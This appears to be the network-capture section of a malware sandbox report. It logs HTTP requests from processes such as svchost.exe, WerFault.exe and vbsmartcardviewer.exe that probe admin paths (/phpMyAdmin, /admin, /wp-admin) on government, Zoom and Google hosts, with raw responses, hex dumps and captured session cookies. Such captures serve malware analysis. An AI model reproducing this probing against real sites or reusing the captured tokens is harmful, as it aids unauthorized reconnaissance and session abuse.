2024-02-05 11:16:12 UTC | 1060 | IN | Data Ascii: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.14 (Debian) - Informe de Error</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:wh


Session ID | Source IP | Source Port | Destination IP | Destination Port
223 | 192.168.2.6 | 65401 | 163.247.44.239 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 185 | OUT | GET /phpMyAdmin HTTP/1.1
Host: mitextoescolar.mineduc.cl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 278 | IN | HTTP/1.1 404 Not Found
date: Mon, 05 Feb 2024 11:16:12 GMT
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: no-cache, private
transfer-encoding: chunked
content-type: text/html; charset=UTF-8
x-frame-options: SAMEORIGIN
connection: close
2024-02-05 11:16:13 UTC | 2926 | IN | Data Ascii: B62<!DOCTYPE html><html lang="es"><head> ... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-4044628-15"></script><script> window.dataLayer = window.dataLayer || []; function g


Session ID | Source IP | Source Port | Destination IP | Destination Port
224 | 192.168.2.6 | 49645 | 138.197.59.199 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 179 | OUT | GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 501 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=m6ZW6nO9UoY9k-niVSF6oRF4.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/admin/login
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
225 | 192.168.2.6 | 65333 | 164.100.213.210 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 201 | OUT | GET /Error/NotFound?aspxerrorpath=/phpmyadmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store,no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                                                                                Server:
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src * data:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.jsdelivr.net https://ajax.googleapis.com www.google-analytics.com www.googletagmanager.com; frame-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' 'unsafe-inline' 'unsafe-eval' www.google-analytics.com; font-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 780
2024-02-05 11:16:13 UTC | 591 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta name="viewport" content="width=device-width" /> <title>NotFound</title></head><body> <div> <b>HTTP 404. The resource you are looking for (or one of its dependencies) could
2024-02-05 11:16:13 UTC | 189 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: s"></script><script type="text/javascript"> $(document).on('click', '#btnBack', function () { history.go(-1); }); </script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
226 | 192.168.2.6 | 49722 | 170.114.52.4 | 443 | 2156 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 333 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=qAyyVUMtN.VwwaJ3DSunEJzUejWU4vbQ3oi8vft7Zmk-1707131771-1-AUpaUHNP7XBH7VoYl7WtbTOFNZTDujAHBqvdFHtA2TvZkyao3SyXavbmho30yF0TtYC7avtf6LVm95z/tp5urOI=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 1350 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=us04;rid=WEB_5efc3c1fe8ebdeded77308ef76196a0b
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-b7H4SGXRSdeaDkA6nzsmWQ' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
2024-02-05 11:16:13 UTC | 1304 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_ssid=us04_c_2TsVMPxySA6MtCkE0_fgjQ; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: cred=2D945E35EAB962EB99C0A6CAA76BF91C; Path=/; Secure; HttpOnlyset-cookie: _zm_ctaid=96cJ51xZS7-G4Q68Kdr4BQ.1707131772947.68e9ed52040922471a055e977
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC632INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 76 69 73 69 74 6f 72 5f 67 75 69 64 3d 30 61 64 63 39 32 63 34 63 38 35 62 34 34 66 30 39 35 34 30 62 39 64 39 34 34 65 31 34 64 62 37 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 34 20 46 65 62 20 32 30 32 35 20 31 31 3a 31 36 3a 31 32 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 0d 0a 78 2d 7a 6d 2d 7a 6f 6e 65 69 64 3a 20 56 41 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_visitor_guid=0adc92c4c85b44f09540b9d944e14db7; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:16:12 GMT; Domain=zoom.us; Path=/; Securex-zm-zoneid: VAcontent-language: en-USCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"ht
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 34 66 36 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 2f 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 23 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 5a 6f 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4f66<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 2c 20 76 69 64 65 6f 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 6f 6e 6c 69 6e 65 20 6d 65 65 74 69 6e 67 73 2c 20 77 65 62 20 6d 65 65 74 69 6e 67 2c 20 76 69 64 65 6f 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 76 69 64 65 6f 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 61 6c 6c 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 2c 20 73 63 72 65 65 6e 20 73 68 61 72 65 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 68 61 72 65 2c 20 6d 6f 62 69 6c 69 74 79 2c 20 6d 6f 62 69 6c 65 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 64 65 73 6b 74 6f 70 20 73 68 61 72 65 2c 20 76 69 64 65 6f 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 67 72 6f 75 70 20 6d 65 73 73 61 67 69 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 6c 75 74 69 6f 6e 20 75 73 65 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 69 6e 20 62 6f 61 72 64 2c 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 68 75 64 64 6c 65 2c 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 72 6f 6f 6d 73 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 65 78 65 63 75 74 69 76 65 20 6f 66 66 69 63 65 73 20 61 6e 64 20 63 6c 61 73 73 72 6f 6f 6d 73 2e 20 46 6f 75 6e 64 65 64 20 69 6e 20 32 30 31 31 2c 20 5a 6f 6f 6d 20 68 65 6c 70 73 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 62 72 69 6e 67 20 74 68 65 69 72 20 74 65 61 6d 73 20 74 6f 67 65 74 68 65 72 20 69 6e 20 61 20 66 72 69 63 74 69 6f 6e 6c 65 73 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 74 6f 20 67 65 74 20 6d 6f 72 65 20 64 6f 6e 65 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 70 70 2f 6d 61 72 6b 65 74 5f 6f 6e 65 74 72 75 73 74 5f 63 6f 6f 6b 69 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 20 63 6c 61 73 73 3d 22 6f 70 74 61 6e 6f 6e 2d 63 61 74 65 67 6f 72 79 2d 43 30 30 30 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 37 48 34 53 47 58 52 53 64 65 61 44 6b 41 36 6e 7a 73 6d 57 51 22 3e 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 49 64 20 3d 20 22 30 61 64 63 39 32 63 34 63 38 35 62 34 34 66 30 39 35 34 30 62 39 64 39 34 34 65 31 34 64 62 37 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 4b 65 79 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 5b 27 6f 70 74 69 6d 69 7a 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pp/market_onetrust_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="b7H4SGXRSdeaDkA6nzsmWQ">window.zmGlobalMrktId = "0adc92c4c85b44f09540b9d944e14db7" || null;window.zmGlobalMrktKey = "" || null;window['optimizel
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 33 36 32 30 30 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 37 48 34 53 47 58 52 53 64 65 61 44 6b 41 36 6e 7a 73 6d 57 51 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 37 48 34 53 47 58 52 53 64 65 61 44 6b 41 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 36200;}.expired-cc-banner .zm-icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="b7H4SGXRSdeaDkA6nzsmWQ" src="/csrf_js"></script><script nonce="b7H4SGXRSdeaDkA6
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 4d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 2d 63 6f 6f 6b 69 65 2d 70 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: M = document.getElementById('ot-cookie-pref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',')
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 64 6b 2d 73 68 6f 77 2d 73 65 74 74 69 6e 67 73 20 7b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dk-show-settings {padding-left: 10px;border-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translate
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 68 42 75 74 74 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: hButton" aria-expanded="false" aria-controls="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><pat


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
227 | 192.168.2.6 | 49770 | 142.250.105.84 | 443 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 229 | OUT | GET /wp-admin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: https://accounts.google.com/wp-login.php
2024-02-05 11:16:12 UTC | 842 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
228 | 192.168.2.6 | 49733 | 31.216.144.5 | 443 | 2156 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 157 | OUT | GET / HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 969 | IN | HTTP/1.1 200 OK
Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2689
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: geoip=RO
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC2689INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4d 45 47 41 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 45 47 41 20 70 72 6f 76 69 64 65 73 20 66 72 65 65 20 63 6c 6f 75 64 20 73 74 6f 72 61 67 65 20 77 69 74 68 20 63 6f 6e 76 65 6e 69 65 6e 74 20 61 6e 64 20 70 6f 77 65 72 66 75 6c 20 61 6c 77 61 79 73 2d 6f 6e 20 70 72 69 76 61 63 79 2e 20 43 6c 61 69 6d 20 79 6f 75 72 20 66 72 65 65 20 32 30 47 42 20 6e 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                229192.168.2.649731104.21.5.254432864C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC159OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
